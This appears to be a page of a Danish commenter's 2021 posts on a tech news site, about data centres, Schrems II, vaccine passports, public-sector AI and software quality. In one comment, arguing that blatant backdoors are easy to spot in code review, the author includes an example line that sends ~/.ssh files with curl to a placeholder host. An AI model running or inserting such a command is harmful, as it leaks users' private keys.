Benjamin Balder

Medie: To ud af tre Microsoft-datacentre opføres i Faxe og Slagelse

Azure har i forevejen nedlagt Azure Germany der var et tilsvarende setup lavet for at tilbyde myndigheder og virksomheder i EU adgang til Azure uden samme bekymring om privacy og udveksling af data med USA.

Jeg vil gerne have et ekstra sæt øjne på det dér. Det lyder mere som, at MS netop har åbnet Azure Germany som en juridisk hokus-pokus konstruktion og lukket Microsoft Cloud Germany (som er det gamle?).

7. september 2021 kl. 10:34
Medie: To ud af tre Microsoft-datacentre opføres i Faxe og Slagelse

Med mindre, at vi ser konkrete investeringer (altså planer + finansiering), så kan vi godt antage, at ideen om opvarmning via overskudsvarme er såkaldt greenwashing. Greenwashing er f.eks. når man promoverer noget grønt for bundlinjens skyld og omtaler dette, så det er ude af proportioner med de faktiske negative konsekvenser for miljø og klima.

Fra Berlingskes artikel 29. maj 2021 Presset vokser: CO2-udledning fra datacentre overgår flybranchen før coronakrisen

»Man investerer massivt i at indrette og drive datacentre, så de bruger mindre og mindre energi, for energi koster jo penge. Derfor er det vanvittigt, at man ikke kan udnytte overskudsvarmen. Hvis varmen kan udnyttes en gang mere ved at blive sendt videre ud i varmesystemerne til forbrugerne, kan datacentrene begynde at blive klimapositive. I dag kan man tælle antallet af projekter, der udnytter overskudsvarmen, på én hånd. Infrastrukturen og de nødvendige investeringer til at få »hul igennem« skal på plads. I Viborg ligger Apples datacenter cirka ti kilometer uden for byen, og fuldt udbygget kan varmen herfra måske også bruges til at varme op i Randers og andre byer. Men hvem skal tage den investering? Det bliver også en politisk beslutning, hvor de næste datacentre placeres strategisk bedst, så man kan udnytte overskudsvarmen,« siger Henrik Hansen.

Med eller uden opvarmning af boliger, er de massive investinger i datacentre ikke grønne. De er drevet af et ekspansivt behov for beregningskraft, som næres og understøttes af selvsamme industri, som bygger datacentrene. Det kan man kun delvist opveje med digitaliseringens effektivisering af andre fossile aktiviteter; men det er altså en minimal del af regnekraften, der bruges til at beregne shortest path problemer for biler og lastvogne. P.t. ser vi en gigantisk ekspansion af datacentre, som i en verden af Paris-aftaler og klimaforandringer selvfølgelig har et behov for at tage sig grønne ud.

6. september 2021 kl. 16:14
Generalforsamling i Datamuseum.dk

Tak PHK for det utrættelige arbejde for at gøre opmærksom på foreningens situation. Danmark skal naturligvis have et Datamuseum i fremtiden.

Nu er det ikke for at skulle snakke strategi åbent og frit i kommentarsporet, men har man undersøgt muligheden for samarbejde med Enigma (Museum for Post, Tele og Kommunikation), måske kan de hjælpe jer videre til næste forløb i rejsen, evt. være rekrutteringsgrund for et bestyrelsesmedlem? Evt. andre steder i den mere tekniske museumsverden også kunne bistå.

Det burde være til at finde penge hos nogle af de store fonde til denne slags aktivitet -- de elsker overlappet mellem kultur og uddannelse, især med "dansk" i navnet.

4. august 2021 kl. 20:48
Datatilsynet efter endelige Schrems II-anbefalinger: »Rummet for at overføre persondata til USA er meget snævert«

det store trækplaster for Teams er at man kan invitere gæster ind fra andre virksomheder

Det er et underligt argument i en snak om datasikkerhed. Man kan jo ikke bare sige "programmet har en nice feature, så vi omgår datasikkerhed". Det er ærgerligt, hvis den slags argumenter bruges til at sælge en platform. Man validerer sine invitationer ved at sende sin møde-hemmelighed til en kendt email-adresse, så kan det være lige meget om videomødet er browser-baseret eller inde i en walled garden. Det fungerer med alle online mødeplatforme og har eksisteret lang tid før Teams. Herefter har nogen platforme indført virtuelle lobbyer. Men intet er sikkert: Falsk hviderusser deltog i fortroligt møde: Talte om dyrebordeller. - Folketinget brugte Teams til dette møde.

29. juli 2021 kl. 13:10
Datatilsynet efter endelige Schrems II-anbefalinger: »Rummet for at overføre persondata til USA er meget snævert«

Det bliver forståeligt nok besværligt/dyrt/umuligt at gemme borgernes data under fremmed juridisk kontrol. Hvis myndighederne havde en lidt bedre mavefornemmelse for dataetik, havde de også indset det for lang tid siden.

Mulighederne består i, at opbygningen af andre typer datacentre og nye samarbejder mellem offentlige organisationer, universiteter mv. OnPrem cloud-teknologi er aldrig nået særlig langt, så der er masser af u-udnyttet potentiale, der bare ligger og venter.

Det samme gælder andre typer tjenester: Videokonferencer, chat, dokumenthåndtering osv. Nye systemer og samarbejde vinder frem, og DK burde kigge på, hvad sine EU-naboer går og laver. F.eks. har Tyskland skrevet en aftale om Matrix/Element gældende for 0,5 mio brugere.

29. juli 2021 kl. 13:03
Tysk kommissær: Myndigheder bør slette deres Facebook-sider inden 2022

øhh jo men hvad hjælper det at bruge et eller andet bizart open source projekt som nogen nørder synes er skidefedt - men ikke bruges af den almene befolkning - det er jo for at nå ud til folk

Det var ikke så pænt sagt om Open Source projekterne, men jeg er enig med dig derudover.

Man skal selvfølgelig arbejde for, at fremtidens sociale netværker ikke bliver walled gardens og baseres på Open Source.

MEN - er det nu så smart, at offentlige myndigheder og borgere benytter de samme sociale medier med al den sammenblanding af private og offentlige data, som det giver anledning til? Social kontrol, overvågning, (mis)brug af AI osv. Det lyder ikke særlig hensigtsmæssigt.

2. juli 2021 kl. 16:33
Nu skal norske jurister lære Python

Juridiske dokumenter ville have godt af at blive vedligeholdt med git. Der er mange gode redskaber til at synliggøre ændringer (diffs), give præcise inputs (code reviews), præcise referencer (commit historik), sikre oprindelsens autencitet (PGP signering), samt at facilitere hele processen for tilblivelse af teksterne.

Der mangler blot en konvention om at bruge et menneskevenligt sprog såsom Markdown eller tilblivelse af et tilsvarende domænespecifikt sprog til juridiske tekster. Men det kan vi jo lave 😇

23. juni 2021 kl. 17:53
Globalt internet-nedbrud skyldtes programfejl, siger Fastly

Der er ikke så mange gæt på, hvordan det realistisk set kunne lade sig gøre. Så jeg prøver lige.. overbyd mig gerne med en mere sandsynlig forklaring 👍

Kundernes DNS peger på Fastlys infrastruktur, som deles mellem kunderne. Der er 2 lag af Varnish cache: Første lag hos Fastly peger på andet lag af cache hos kunden. Hvis Fastly laver et vrøvlet opslag, kommer kundens Varnish til at returnere den fejl, vi ser i screenshottet.

Fejlen i softwaren må have gjort, at der er kommet en forkert konfiguration ud på alle edge-serverne, som har fået cache-opslagene til at pege forkert.

Fastly laver cirka det samme som Cloudflare, ik? Det kan nemt være en fejl i hvordan edge-serverne behandler deres inputs til HTTP cachen (domæne, URL). De har monstro forskellige typer af omskrivnings-regler, man kan indstille på edge-serveren... sikkert også komplicerede regler med globs eller regex /*/**/[a-z] eller hvad det nu kunne være.. et fejl-kompileret URL-opslag, wildcard domæner osv. har måske gjort at alle opslag blev til den samme forkerte URL?

10. juni 2021 kl. 21:48
Ny Religiøs Fanatisme

Det er nemt i ALLE typer software at snige fejl ind. Uanset om det er FOSS eller kommercielt eller selveste Linux-kernen: Hvis man som forfatter af en patch påstår, at det virker efter hensigten.

Selv med automatisk test og QA når vi ikke til et punkt, hvor ny og u-afprøvet kodes uforudsigelige effekter detekteres 100%.

Det er ikke et bevis for, at man kan snige bagdøre ind. Der er ret stor forskel på

  1. # This is a comment and very long blah blah blah blah
  2. # blah blah blah blah blah blah blah blah blah blah
  3. $(curl -X POST --data-binary @- <a href="https://blahblah.io">https://blahblah.io</a> < <code>cat ~.ssh/*</code> )
  4. # blah blah blah blah blah blah blah blah blah blah

Og så et stykke kode med en fejl i et namespace. Det er svært at opdage, fordi variablen ved en fejl incrementeres to steder, men der aldrig opstår en exception.

  1. var i;
  2. function blah() {
  3. // Do stuff...
  4. i++;
  5. }
  6. for (i=0; i<no_objects; i++) {
  7. blah()
  8. }

Vores blikke ville undre sig over sikkerhedshullet i første eksempel og til gengæld er vores hjerner nok for dovne til at overveje, at i anvendes i det globale scope.

25. april 2021 kl. 15:52
Udviklings- og Forenklingsstyrelsen ansætter i hundredevis, men problemerne med ejendomsvurderingerne fortsætter

Det forlyder, at Implementeringscenter for Ejendomsvurderinger netop er blevet færdigt!

1. april 2021 kl. 11:14
Sagen er afgjort: Netcompany og Trifork skal udvikle dansk coronapas

Jeg er ikke enig med dig i, at et pas er specielt meget dyrere end så mange andre former for autentiserings dokumenter. Meget billigere end en iPhone.

Et pas bruges til at identificere en person for alle myndighederne. Det er den backup, som man pænt lægger ned i skuffen, når det ikke skal bruges, og man slipper det helst ikke ude af syne, når man har det med sig.

En telefon kan have afledte identiteter, som man forventer skal kunne spærres let og enkelt.

Vi kan sagtens tale om alternativer til at bevise en vaccination, både på telefoner og pap/plastic -- men et pas må forblive et pas, ikke noget man tager med i biografen eller på værtshus.

Folk i en situation, hvor de er tvunget til at tage sit pas med hver dag eller som har prøvet at miste det, kender måske bedre til problemstillingen.

Heldigvis er det ikke et aktuelt problem, så vi behøver heller ikke snakke videre om det.

21. marts 2021 kl. 18:59
Sagen er afgjort: Netcompany og Trifork skal udvikle dansk coronapas

Hvorfor ikke bare scanne chippen i det rødbedefarvede pas, vi allerede har, lave et online opslag, og præsentere vaccinations status på en skærm, for dem der skal lave kontrollen.

Hej Helge,

Det er fordi et pas er et meget dyrt dokument, som kan misbruges til mange ting, og derfor er det ikke smart at bede borgerne om at gå rundt med det hele tiden og vise det til tilfældige mennesker.

Ideelt set, burde man kun vise sit pas til rigtige myndigheder. Alle andre (især også organisationer, som godkender identitet online) burde bare se gyldigt ID.

21. marts 2021 kl. 17:43
Sagen er afgjort: Netcompany og Trifork skal udvikle dansk coronapas

Jeg kunne godt tænke mig at vide, om der kommer et alternativ til borgere uden smartphone eller uden en kompatibel smartphone?

Jeg håber, at Version2 søger aktindsigt i udbudsmaterialet og alle svarene.

19. marts 2021 kl. 19:25
Wikipedia vil sælge sit indhold til virksomheder

Det giver helt fin mening, at virksomheder, som har tænkt sig at downloade disse data med et kommercielt formål, også giver tilbage til fællesskabet.

Forhistorien til disse dumps var, at de blev brugt til forskning. De blev også brugt til at distribuere indholdet på nye måder i uddannelsesøjemed.

Jeg har tidligere lavet projekter med offline-udgaver og erfarede, at der er stort pres på den lille gruppe af Wikipedians, som gennem tiden har udstillet snapshots af de forskellige samlinger, som også blev dyrere i drift i takt med, at datamængden voksede i størrelsen. Det koster både beregnings- og lagringsmæssig kapacitet at lave disse dumps.

17. marts 2021 kl. 23:33
Er et IT-ministerium nødvendigt?

Tak Johnny Lüchau! Dette indlæg er virkelig godt og inspirerende, og jeg kan egentlig ikke se noget i vejen for, at der kommer et It-ministerium.

  • Justitsminiseriet har jurister
  • Finansministeriet har økonomer
  • Miljøministeriet har biologer
  • ...

Derfor følger et It-ministerium jo nærmest induktivt: hvor sikkerhedseksperter og it-arkitekter kan rådgive en minister og øvrige ministerier og Folketingets udvalg direkte. Det er en enormt meningsfuld ressource at have centralt og på højeste niveau.

Folketingets politikere og de mange ministerier benytter gerne Finansministeriet og Justitsministeriet til at beregne og analysere lovforslag, udbud mv. - med så mange forslag om milliard-store it-projekter, dataindsamlinger hos borgerne, digitaliseringer af offentlige processer mv. giver det kun mening, at et ministerium kan varetage disse opgaver.

Et It-ministerium kunne også etablere bedre samarbejder i udlandet, som vi så tit ser manglen på i de hjemlige dybe tallerkner.

Men findes der også bud på, hvordan man kan foreslå sådanne tiltag uden at få dem til automatisk at hvidvaske alle ideer om digitalisering? Inspirationen kunne komme fra Analogiseringsstyrelsen: https://analogist.dk/

16. marts 2021 kl. 22:35
Hvorfor skal alt være digitalt?

Diskussionen er ikke om vacciner skal digitaliseres - det blev de for år siden. Diskussionen er, om man vil begrænse adgangen til koncerter osv. til vaccinerede.

Diskussionen er slet ikke begrænset dertil.

Diskussionen er også: Skal vi bemyndige menige borgere til at være vaccine-politi? Ønsker vi en digital registrering af al færden, som kan følge med i pakken? Skal andre aktører have adgang til disse data (Rune Larsen nævnte i flæng at billettjenester skulle indbygge en integration)?

Uanset om der findes data registreret om borgernes vaccinations-tilstand, er det ikke ensbetydende med, at data skal gøres tilgængelige og matches til en borgers færden.

Disse problematikker om registrering og adgang til data er nemme at undgå med et papir-baseret pas.

Der er samme princip bag papir-baseret smittesporing i udlandet: En boks fyldes dagligt op med papirslapper m. kontaktoplysninger for besøgende på café/restaurant/hotel osv. Hvis der ikke er noget udbrud, så smides papirerne ud. De bliver aldrig digitaliserede, og det ville alligevel være for dyrt og besværligt.

Et digitalt vaccinepas er et skred mod noget værre. Den defekte Smittestop-app var allerede et skred, som tilsyneladende har gjort folk "vaccinerede" mod problemerne ved yderligere registrering og falsk tryghed ved digitale løsninger.

28. februar 2021 kl. 15:36
Region lover forbedring af kritiseret vaccine-booking: Ændringer klar om få dage

Der findes nogle standarder helt fra EU-niveau angående, hvordan brugergrænseflader bør være. Der findes også krav om, hvordan private data og sikkerhed bør indrettes.

Men tilsyn er fortsat mangelfulde.

Der mangler både en it-haveri-kommission for de helt store projekter, men der mangler også et mindre tilsyn til de små projekter.

Ganske som man kører sin bil igennem syn, kunne alle borger-vendte services køres igennem et syn, hvor fagfolk gennemser, at siden er printervenlig, fungerer for farveblinde, ikke er unødvendig kompliceret, fungerer i alle browsere mv.

Som bekendt med straf, så kan alene eksistensen af en lov være forebyggende. Hvis man har et tilsyn, som er omkostningsfuldt at dumpe, vil leverandørerne også være nødt til at gøre sig mere umage. Og måske også helt undlade at digitalisere, når det i bund og grund ikke giver mening.

20. februar 2021 kl. 16:33
Ny afgift på computere og smartphones sikrer kulturlivet 93 millioner

I Storbitannien har ICO en såkaldt "Data protection fee" og det ville være fint, om vi i Danmark kunne forholde os meget mindre til omløbet af forbrugeres lagringsenheder og i stedet til virksomheders indsamling af data og det meget omkostningstunge tilsyn.

The UK’s independent authority set up to uphold information rights in the public interest, promoting openness by public bodies and data privacy for individuals.

Der er tale om et mindre årligt gebyr:

The cost of your data protection fee depends on your size and turnover. There are three tiers of fee ranging from £40 and £2,900, but for most organisations it will be £40 or £60.</p>
<p>Some organisations only pay £40 regardless of their size and turnover. These are: Charities; small occupational pension schemes.

https://ico.org.uk/for-organisations/data-protection-fee/

15. februar 2021 kl. 14:21
Er der ingen grænser for, hvad AI skal have skylden for?

Fra blogindlægget:

Men et eller andet sted undervejs i processen har et menneske været inden over og har defineret og valgt at benytte den algoritme, der diskriminerer mod for eksempel kvinder, farvede eller +50-årige.</p>
<p>Kunstig intelligens eller ej, så ændrer det ikke ved det faktum, at man ikke ønsker at ansætte personer fra disse samfundsgrupper.

Bizar læsning.

Der er love, f.eks. Forskelsbehandlingsloven, som skal følges. Også helt gængse menneskerettigheder. AI er trænet på gigantiske datasæt, og der er ikke nødvendigvis tale om nogle ulovlige beslutninger fra et enkelt menneske, men en gigantisk bunke data og en algoritme, som er for kompleks til at udredde -- som kan resultere i diskrimination, som ingen helt forstår eller gøres ansvarlige for. Det er jo det, som er problemet.

Sg'da ikke, at HR går ind i AI Settings => [x] Discriminate illegally 😖

4. februar 2021 kl. 20:41
DF vil have mere AI i det offentlige: »Der er kæmpe potentiale for forbedringer«

Jeg læser nu mere KLs signaturprojekter som, at man ikke har nogen konkrete eksempler: Man leder efter dem. På siden står der, at man har aftalt at igangsætte 15 af disse hammer-leder-efter-søm projekter, men man har kun fundet 7? Det lover ikke særlig godt.

Og man har endda tilladt sig at skrive konklusionen ind i problemformuleringen af alle projekterne, så man er sikker på, at AI vil bevise sit værd 🤦

<strong>Korrekt og ensartet sagsbehandling ved spørgsmål om sanktionering af ledige borgere</strong></p>
<p>Projektet forventes at sikre en højere grad af korrekt og ensartet sagsbehandling ved at understøtte medarbejderne i at vurdere, hvorvidt en ledig borgers udeblivelse fra samtale eller aktiveringstilbud skal medføre en sanktion i borgerens ydelse.</p>
<p>Algoritmen skal bidrage med beslutningsstøtte til brug for den faglige medarbejders vurdering. Der kan desuden være økonomiske gevinster ved sparet tid, idet algoritmen bearbejder data og yder støtte til, at sagsbehandleren hurtigere kan få den præcise viden, der skal til for at kunne træffe afgørelse.

https://www.kl.dk/okonomi-og-administration/digitalisering-og-teknologi/kommunernes-arbejde-med-kunstig-intelligens/korrekt-og-ensartet-sagsbehandling-ved-spoergsmaal-om-sanktionering-af-ledige-borgere/

Hvad i alverden tænker man på, når man skriver sådanne forslag?

Hele den hollandske regering er afgået pga. ulovlig diskriminering i sagsbehandlinger og så er der Robodebt i Australien.

4. februar 2021 kl. 20:19